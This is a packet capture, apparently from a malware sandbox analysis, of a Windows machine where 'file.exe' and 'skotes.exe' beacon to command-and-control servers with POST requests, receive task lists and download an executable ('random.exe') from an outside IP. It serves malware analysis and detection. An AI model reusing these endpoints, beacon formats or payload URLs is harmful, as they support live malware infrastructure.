Nov 23, 2024 07:09:56.551525116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:09:56.551537037 CET	1236	IN	Data Raw: a3 e6 fb 02 72 14 2b d9 12 c9 c7 06 ae cd 45 7d 7d 75 63 c6 f5 a3 3a 75 9c 43 5e 23 63 27 4a 56 3f eb d6 8f 02 2b ce 42 66 30 e6 44 e2 c2 f6 7e d2 33 0a 83 d6 d1 ba f9 3d 32 7a d2 65 94 4b 79 e2 a7 97 35 8a 70 a7 76 6c f4 49 44 22 32 b2 30 6d 50 Data Ascii: r+E}}uc:uC^#c'JV?+Bf0D~3=2zeKy5pvlID"20mP{E2E69vvct}^>~*+KDY~K'?O'u9B1,fCK`z=BBxuc:DU#JcBV(t:ab{\{GjJW4BKJt;"fZ'zu
Nov 23, 2024 07:09:56.551548958 CET	1236	IN	Data Raw: 13 e7 11 b3 53 ff bb 04 7a 8b 07 80 bb 00 c0 9f c2 e5 4f ae 6d a4 27 1b ed de 4b 96 1e ab 2a 43 f2 c5 93 4a 5c 0b 43 0d 1f 89 3f 4e c5 27 aa 12 4e 44 cb 39 64 f4 40 47 4a 25 c9 f1 60 93 c7 56 02 e7 5d 32 42 bb 0d 65 be f8 44 aa 52 68 67 22 e8 42 Data Ascii: SzOm'KCJ\C?N'ND9d@GJ%`V]2BeDRhg"BCA;v@7hF"v9P\|t Jm'~_$%v0j8~.?GQ(Hkck<u:("xd}O#Jjsu{=(jq}W*o]?z&fyI
Nov 23, 2024 07:09:56.551562071 CET	1236	IN	Data Raw: 96 3c 21 bf 2a 3a 26 19 26 30 a3 c0 6d c2 03 74 bb 58 d5 62 f7 b7 18 93 c3 cd 12 97 3a 35 02 5c 51 62 34 50 26 c8 76 25 3a 92 47 17 03 4f 78 04 10 bb 21 b4 eb 28 c0 33 2d 0b d7 44 81 17 95 b6 eb ca fd eb ed 4f 67 16 4b 46 e3 14 2a d6 3e 19 b6 87 Data Ascii: <!:&&0mtXb:5\Qb4P&v%:GOx!(3-DOgKF>$^`B/?ebw%-h%zmX,{E5npFh=~0w@iavd^nXyP%#\d'v'nGD;wK"a_w8IDek\|^}s7]6
Nov 23, 2024 07:09:56.551954985 CET	1236	IN	Data Raw: bb 0d 48 9c 6c 4b fd 33 7e 27 ee fa bb 6d ba 3d ca d6 f1 27 30 5b 45 f6 6d ad cf a1 4c f0 6c 99 46 2f 15 9d 90 53 91 26 c9 4f 2f 73 86 1a 8f 3e 6a a3 5e 0b ff 89 48 40 39 a0 f7 18 4b 68 a2 d5 6c f5 b2 75 70 ad ae 9f 6d 67 5e dd 24 cc 18 30 f9 3e Data Ascii: HlK3~'m='0[EmLlF/S&O/s>j^H@9Khlupmg^$0>/aju.}9Q[,}$t'"8u/]oKK\|%$J?6TC2N>F(*10>+B1;N{/w}rCy]3n$$z7
Nov 23, 2024 07:09:56.551964998 CET	1236	IN	Data Raw: 1f 07 75 c2 bd 61 56 1b 36 0c 66 2a b2 c2 43 b2 1e 05 89 90 46 cf 2b dc ac 03 87 0f 81 79 53 16 92 2b f2 18 4e 22 e0 0b 40 62 fb 34 1a 3c 2a 1b 25 07 0c 7b 91 e1 63 40 db 22 f4 1a 68 3a 34 53 2e c0 0b e1 9a 72 52 b3 aa f1 a2 78 7d b3 62 07 97 01 Data Ascii: uaV6fCF+yS+N"@b4<%{c@"h:4S.rRx}b;gD)!]bj[[GWew9?`6:/!'$l"oj%<pgLVx>Ltmjudsq=F*m#JAXgd{VqF y#x>
Nov 23, 2024 07:09:56.551975965 CET	1236	IN	Data Raw: 7b 39 ea 8f 70 f5 8f d9 60 51 e4 41 c4 b0 fb 65 ae cd 90 6a 2a 67 7c d7 4f 15 45 60 cd 09 f4 27 80 06 39 1f 88 6d 5b 80 6c 2d e2 81 48 b3 f9 85 c1 ee 27 43 66 33 65 3e 0c aa ad 5e 12 74 87 fc 3e 7b 75 ee 53 39 40 53 d2 d0 6c f6 8b 74 ac 0e a3 ff Data Ascii: {9p`QAejg\|OE`'9m[l-H'Cf3e>^t>{uS9@Slt'Bd{{z6-yE;giw8Kt4,>IEbQmO56,b%w.uWb)BPV{kcB^d<L=~Q/ttyG=wVWy)]$2c=P&
Nov 23, 2024 07:09:56.671072960 CET	1236	IN	Data Raw: 5a e5 af af 28 ed 63 07 f9 e9 68 13 5a b7 ff 26 84 0b c5 9b 74 ba 63 96 fa d7 bd 3a fe 7b 7b ae d2 8a 44 fe 7f c7 c7 39 0f 49 cc d7 38 bb fb cf eb 68 a7 9e 7e 77 f7 9c 6a b2 9c 3e 40 b7 b1 20 1d fc d0 34 84 0f b9 23 ed 92 d3 94 b4 cf 54 b2 89 7b Data Ascii: Z(chZ&tc:{{D9I8h~wj>@ 4#T{.ja2'[Dw=$}+V2,Oaw/P~ml[1rEl[ObC_,J[um}Rmc.A<-I&#ox`dipO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49958	185.215.113.206	80	2128	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:10:00.502837896 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 62 33 61 65 38 36 34 66 37 30 36 33 38 33 30 35 61 38 38 37 65 30 39 65 35 63 31 61 39 64 30 30 39 31 62 62 63 66 30 31 30 37 62 31 31 33 38 33 64 63 64 61 64 63 39 63 66 36 63 38 30 34 62 65 36 38 66 33 30 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"56b3ae864f70638305a887e09e5c1a9d0091bbcf0107b11383dcdadc9cf6c804be68f30f------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHCBAEHJJJKKFIDGHJEC--
Nov 23, 2024 07:10:02.449398041 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:10:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	56481	185.215.113.43	80	352	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:11:05.068711042 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 23, 2024 07:11:06.444417000 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 06:11:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	56488	185.215.113.43	80	352	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:11:08.078039885 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Nov 23, 2024 07:11:09.471503019 CET	644	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 06:11:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 63 35 0d 0a 20 3c 63 3e 31 30 30 38 33 36 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 38 33 36 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 38 33 36 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 38 33 36 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 [TRUNCATED] Data Ascii: 1c5 <c>1008361001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1008366001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1008367001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1008368001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1008369001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	56493	31.41.244.11	80	352	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 07:11:09.596436977 CET	54	OUT	GET /files/random.exe HTTP/1.1 Host: 31.41.244.11
Nov 23, 2024 07:11:10.979123116 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 06:11:10 GMT Content-Type: application/octet-stream Content-Length: 4416000 Last-Modified: Sat, 23 Nov 2024 05:31:14 GMT Connection: keep-alive ETag: "674168a2-436200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 70 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c5 00 00 04 00 00 d6 bd 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 5d c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 5d c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2pJ@C@ _qs]h] px'@.rsrc p'@.idata q'@ 8q'@lklnedip'@cepbmidj`:C@.taggant0p"@C@
Nov 23, 2024 07:11:10.979159117 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:11:10.979168892 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:11:10.979229927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:11:10.979242086 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 23, 2024 07:11:10.979263067 CET	1236	IN	Data Raw: 80 df f9 1f 2f 1c 84 49 d7 52 19 74 2e 2a de 6c 54 b8 31 3d 97 ce b7 eb 78 17 99 60 5c d2 ef 2b 8e 2a 21 e4 f4 8b ff f7 02 83 90 88 f7 f1 08 73 7d 61 b0 24 dc 96 73 32 a6 5a 88 cd 5b 8e 70 1a 3f 75 c2 34 ec 25 30 83 fe f9 01 2a b8 b4 f8 aa 69 57 Data Ascii: /IRt.lT1=x`\+!s}a$s2Z[p?u4%0*iWxrfC z_vnK\QONLZ!YJVl051-#lyG\\|4X_sM5e)z+up'<5
Nov 23, 2024 07:11:10.979273081 CET	896	IN	Data Raw: 3e f4 aa fd d9 cf 9d 08 5b 42 ff 34 31 0f 9e 96 aa 73 d5 f3 eb 6a d3 07 41 82 7e 7b 8b 0e 26 b6 30 a8 73 68 b7 e9 12 37 4f 15 bd 8d 37 d3 e2 51 d1 f5 b4 48 d0 1a cb 8b bb 4a 61 55 25 60 1c c9 5c 92 1b 74 9e 84 d2 8d 6f c5 39 56 f3 4d 9a 0b df 25 Data Ascii: >[B41sjA~{&0sh7O7QHJaU%`\to9VM%IJl;nde"RN@Zehr5jKRv_;nS[54&yYB1D{*T%StMW(-h(Ni/CK}R018RU0FQB,#
Nov 23, 2024 07:11:10.979412079 CET	1236	IN	Data Raw: f8 bb d4 37 f6 4b 92 6f 56 f6 cf 73 e2 c6 65 5d e3 69 d9 ee 5f 29 71 03 b3 db 26 0c 20 0c 59 9d ad cd a8 a2 28 4c 65 18 51 c1 ca eb d9 c6 cf d6 e6 40 25 c8 d1 c2 d9 b9 0c c3 5c ae 77 6e 63 74 ac 59 c4 ab f3 5a 28 0a d3 ec 04 ee 9d 08 8e 08 75 fb Data Ascii: 7KoVse]i_)q& Y(LeQ@%\wnctYZ(u@snOG~+* AU~Ryu7y-x58}Jg\G[6"(4]r+@Ebm*PzKG6Yz2O^.G1DrKyW
Nov 23, 2024 07:11:10.979423046 CET	1236	IN	Data Raw: eb 4e f8 cd 95 82 5d 7f f4 8d 65 7f 69 51 c7 0c f7 b5 a8 6d 33 c5 ee 7f 0c 76 f1 ea f0 1a 85 53 04 6f fa 05 53 b1 dc ee 3e 57 28 f3 6b c7 92 75 2b cd 6e 5d d4 85 19 31 af fe 0a 20 cb a7 e3 f6 34 42 c5 70 91 e2 ef d5 cf c7 af 6a 75 20 c9 40 72 7f Data Ascii: N]eiQm3vSoS>W(ku+n]1 4Bpju @rO(G`[W#Snhx+Lg&J)}xICg ]ZSfnu[.1+lsJa<!\]zJb)Ds8\'E^HU-Ab88\|5-Jwi%39q2uK]
Nov 23, 2024 07:11:10.979433060 CET	1236	IN	Data Raw: b0 51 93 d0 64 cb 5f b8 f3 40 e4 97 e7 29 39 2b f2 d9 62 f7 0e ec 41 fa d8 fa d6 f9 20 16 7d 48 29 87 71 f8 b2 36 e8 c2 9a ca 42 1f 07 15 72 45 ab c5 63 6a 64 b6 1e 12 17 97 3d b8 a3 e3 3d d9 fc b3 48 eb b7 4a 30 5d 06 2a f6 32 52 58 9f 12 f1 96 Data Ascii: Qd_@)9+bA }H)q6BrEcjd==HJ0]*2RXW&tTLBG~9K1;i',S?W&>QmrVEriSOa#8!$f3U mmSYa3?]e]ps`j
Nov 23, 2024 07:11:11.098808050 CET	1236	IN	Data Raw: 05 04 91 26 73 99 13 64 9f 06 6e b4 29 5d 7f cf 05 60 3f fd 52 40 d1 13 b3 66 89 45 5b 88 c5 cf dd e5 82 0e 54 3f f1 08 7e cc ad 8b 17 da 84 86 c6 ab 64 14 d5 69 17 8d df e6 9c 71 c4 83 2e c0 5b 62 8d 00 d7 7a 5a ba 12 11 11 0d db 3e 32 f4 b2 ff Data Ascii: &sdn)]`?R@fE[T?~diq.[bzZ>25F#E6nGH\yIoPt{>3mAqkUsLKwyYq}'j5zcRO*Hngd^Q>$&RCpdOO}\ya'=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49712	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:08 UTC	1572	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064722Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=984cc50f254047018b405213e27a1630&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597590&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597590&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waas [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 Cache-Control: no-cache MS-CV: 2ootsPAFokK7xISX.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:08 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2932 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116219-T1-C128000000001627409+B+P20+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: t44qDdYgQVjletveYKLN95CLX4EXVfkYCZ1wxnXUDZHfJukNRvzWgRGhhlJFd1R4UEmZxR7o+mCO+cgluVksDTse5UI+57lCwwnUlJe1F8h5YWfU+JeQCtxpXfoCcXve9gLhzfOVYSPs/XtFOp18Od6MyqS2UakZSerX3cBu1lM8SYgok/2/Cpy98ZAW4cfoX0xapDSjMjDlaPU5XOfb6eytjLpPNsh+NwMZDIJ5JHdEPZc6+p9CO41XKlnDWbhgw4DElqxjuPh6FtkpFUCuQgOrccYdx1fYAOcSBzOg2U2W/qsd9Hy3A0sy2bmo5RZAwPRpFm5Fitj6ukItvqEDVQ== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:08 GMT Connection: close
2024-11-23 06:09:08 UTC	2932	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49713	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:08 UTC	1579	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20231005T064722Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=874154d8f3a748c29b97a8d26c03d7c9&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=597590&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=597590&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 Cache-Control: no-cache MS-CV: 2ootsPAFokK7xISX.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:08 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 1408 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: a65mccuRZS/Vgsvd6+JpM+oflLl65Rj1fX//JzyMY9iJyZU1xQiakxPD5kwIC4GfbE1AKgI6LjtFCvfU2pBslkL6/9mbQAC33X1cq7jXKw5BzWl/N62nvZAJqFR2uTpyuqiHeXtlOQ8PdZLmcTxgA2WVgP+8B014G8K2NahRMDNtmmHaIh7yh2LxIv9e3VzYqOApfw+7sCwODOoS/PjfVTNjSTHM+EevZjmmbwzQCZ/jYPPqQ6M8k/SFbHsN5gWumuYNK8dAfDINjBcTWWRpUOr2OfX9qn49Jfv+vlIEuCwVexdEA3bBwq5RSTDJNIbWUprAf0SyT7lK8LU7PK7jCw== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:07 GMT Connection: close
2024-11-23 06:09:08 UTC	1408	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 45 6d 70 74 79 43 72 65 61 74 69 76 65 5c 22 2c 5c 22 70 72 6f 70 65 72 74 